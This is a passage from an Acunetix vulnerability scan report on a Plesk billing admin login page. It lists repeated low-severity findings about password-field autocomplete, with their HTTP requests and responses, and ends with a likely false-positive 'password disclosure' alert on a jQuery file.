User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated)
Acunetix Website Audit70
...%2bNESUPixZHRGIk%2fSfC4EERvUh4US7IQSHLE3%2f7B%2bI%2b%2b7BTmVZ%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=vtk10sf6g7c9jhtzd1f55j
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:30 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:30 GMT
Server: sw-cp-server
Content-Length: 6624
/plesk-billing/admin/index.php/default (b765568e1ea0af3bca9e78542209cdab)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 811
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ZnMpMOTOLmyHTbtJCIuV8mhqjojAr97mi4sKAH5D74f8gpTpD0P7b6N2DXi5ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=kb6o8o1jup1xvat023q48obwudllhfk3hi9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:32 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:32 GMT
Server: sw-cp-server
Content-Length: 6568
/plesk-billing/admin/index.php/default (b9d6c5c417318656b4d1924c03505eb5)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Acunetix Website Audit71
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...tGJzC5%2bVtvOdRpIBD4k1MBy4gz%2bExXxtIgffMfuv%2fi%2bDcE%2fmOUR7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=dzdzpqpoxjuq68gfyrbs9i
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:30 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:30 GMT
Server: sw-cp-server
Content-Length: 6560
/plesk-billing/admin/index.php/default (bb12bc9493fbfd257e3b9d5546305c55)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 875
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...%2bNESUPixZHRGIk%2fSfC4EERvUh4US7IQSHLE3%2f7B%2bI%2b%2b7BTmVZ%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=xh7fm5pytl68venj5o9ntx314dllhflgyxa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:34 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:35 GMT
Server: sw-cp-server
Content-Length: 6624
/plesk-billing/admin/index.php/default (bf389218a1a7c819f912e3b8dea29d4f)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Acunetix Website Audit72
Content-Length: 787
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ZnMpKgZnFzSLLbtJAIuV8Qo3RUZiV%2b1hTcWDAd8r98H%2bUUp1F0P559O5JLxc0n4gWLixyK%2fz0VAbM%2bXVpMzkVvjiMbdlkBQzgHB%2foq6Jpizq91fCOCNE%2fN2JWfELjt9TqiEGK5DHPNeZ2gioxpVUkWLcDNnZGu1PfTPP1gnaH7TUMoxZeXDsUtVzX3cE5qfV0lp04NWzbBRKFOG6jafu4snVYp0HN%2b1%2bLv4WDqE3osbXtS4b2zasbs9AamIy%2b0Ii0q01lDNMvN2UoHUrqIDFr%2fnMrQQVvj8dm%2f9%2b5OqXFKycvvPrAs40hrkKj5DlKlJTkPf4Ac1gURQ%3d%3d-01b99c8bb5066633b1b1a1ad9d5f1b706e88f586&request_id=yrowwhebzhmk83pzpv9vmf
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:24 GMT
Server: sw-cp-server
Content-Length: 6421
/plesk-billing/admin/index.php/default (d304c57150d464d93a87e0a82dc39125)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...tGJzC5%2bVtvOdRpIBD4k1MBy4gz%2bExXxtIgffMfuv%2fi%2bDcE%2fmOUR7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=woyy3afcety9cfp4ht2gzmqjidllhflglly&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:34 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:35 GMT
Server: sw-cp-server
Content-Length: 6560
Acunetix Website Audit73
/plesk-billing/admin/index.php/default (da23cfed0c678bb49937c6587e831277)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 765
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...l742eE5cSa483ZSMnpVhAIz1i%2biqO7yQiLlQ0ZNyVBclP9QT2lfxHfG%2ffh%2fjFKdRNTh6xT8Y2H%2fRGS5cMidCPNjHbHEN%2bReSijcekxjxWMDDOCUHtg1VddXbX6b8R0Rk31uxKL4jCZsobUJg5TIU5xriu0ITWbKTWTY8CXZ2J%2bb40jBuvaXdK8no5uOxu6ig1tuUt6u2lortZ5PMuBlZlsVSBTTuo2m36XG1nGdR7XsX204xwfRmrjD3vWXAt11Nz8VoakKmXyhEbmqTWUKM9izMpTvSZ4gsWj%2bczuCBt7u983%2bv8vqlRY3TkEE9XGXNmW4Co2SlyRRUlZ3%2fwNAYhUF-6aa08bb638a3c7ef52dd1951e77f710d12a89d36&request_id=a8x4rz5n8jyth4atjh08g021kdllhffm705&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:26 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:26 GMT
Server: sw-cp-server
Content-Length: 6413
/plesk-billing/admin/index.php/default (db55880a016747fd67f1fecc4a176204)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 819
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...aP7MEv3%2bQFi8aA%2b5EP%2fP%2fJsubCjLYW8sKD9E%2ffuUS%2fPynxBXCizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=c220q1jnalmn2xo8hd0quy5psdllhfhhfw6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:26 GMT
Cache-Control: max-age=2592000
Acunetix Website Audit74
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:26 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default (e4847cd386b3cb94d8f77609247353bd)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 823
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...kAi9CGjxmQlzug%2fyU2aFNUH19D%2fH5fEi4g6fBuDf9D2qswXIsuFU9yJMD2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=gthavoihu30xh5rn2y17pmtz8dllhflhn6h&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:34 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:35 GMT
Server: sw-cp-server
Content-Length: 6564
/plesk-billing/admin/index.php/default (eb0c525c637924396a0d69a151d9277f)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 773
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...voWOSPcOjPiFBymHh0wbdwidr1VakiEzifUGK2EBd0HuYmdgnzn6rv%2f45rwIoLyX0bvnpS5Sv2JyHBhJbfCz095kHtwTZrFHgc3Tsay3V0BDOASD7RFVtVZmb6ie0eEaJxrsSCfpfZHXGXESIrkMcg1BnaGIjGlGSRYE22ct63vvavudy0v1fX3cHcDboNf13VDvCo1n9UU78tkXoqZHTOQRCF2O1jqGCyt3Tp3uPQvxt%2fCIEodWlnb%2bnmHttWrG3edJbAp2pJapBkdIqMIb26oKS1IqiCxKP7reIIC3h6Pw%2f2%2f%2fXSoxCsnLzx%2bxJ7G8Fah5MT3COVESdfjD%2f2JDf0%3d-3e2d8237554de288723d4ae69cc01c78981623f6&request_id=iadl6yl2ga89192xs60901
Acunetix Website Audit75
 
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:26 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:26 GMT
Server: sw-cp-server
Content-Length: 6413
/plesk-billing/admin/index.php/default (f8934c24010b6d2e55d5e1b95bfab975)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 811
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ZnMpMOTOLmyHTbtJCIuV8mhqjojAr97mi4sKAH5D74f8gpTpD0P7b6N2DXi5ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=ohkar5872rzsy18z2r3mpyh30dllhfn1zz3&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:37 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:37 GMT
Server: sw-cp-server
Content-Length: 6568
/plesk-billing/admin/index.php/default (fca8ee49d7af78f79b1b0fcfd0d7bb4a)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 779
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated)
Acunetix Website Audit76
...QPRxi0sR2zSQEThfFLxmD4swn18gWge5Lt86P9HniMXdrLlKC4sKP%2bFe%2feszIvUnxANZVZSy%2fz0XAaZWXWJeCZAjZOxLS9UAQG4xA8OVdG0RZ1O1b8rQtyVarYIOkntd0J11EiM5pHdGhmdoUpOCXumcARyNle8nfsmTpt7vtzv1yPnfAzT9bhdqnVTw1bNo1LTZWBiXsnOXSKGOG63aQ%2fxetZ%2bnXqxDL%2bNn8MTq3U4yNa2r1l6aDbHc9AayBj3kpqle9lTRpjezEJjehSpA9mi6K%2b9BBW8PR77%2bv%2beoROKbRQ98%2bKDzzECW5mSI83Y5IgpyuMPjQn%2bww%3d%3d-af7e49ce9dfa8345b75b5bc5c74a9491d10e7cdb&request_id=i7tm8twu1exhu2r8nhzv05
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:16 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:17 GMT
Server: sw-cp-server
Content-Length: 6413
Possible username or password disclosure
 
SeverityInformational
TypeInformational
Reported by moduleScripting (Text_Search.script)
Description
A username and/or password was found in this file. This information could be sensitive.


This alert may be a false positive, manual confirmation is required.
Impact
Possible sensitive information disclosure.
Recommendation
Remove this file from your website or change its permissions to remove access.
Affected items
/plesk-billing/js/jquery/jquery-1.5.2.min.js
Details

Pattern found:
password:function
Request
GET /plesk-billing/js/jquery/jquery-1.5.2.min.js HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:19 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 85925
Acunetix Website Audit77
Date: Wed, 28 Sep 2011 14:43:19 GMT
Acunetix Website Audit78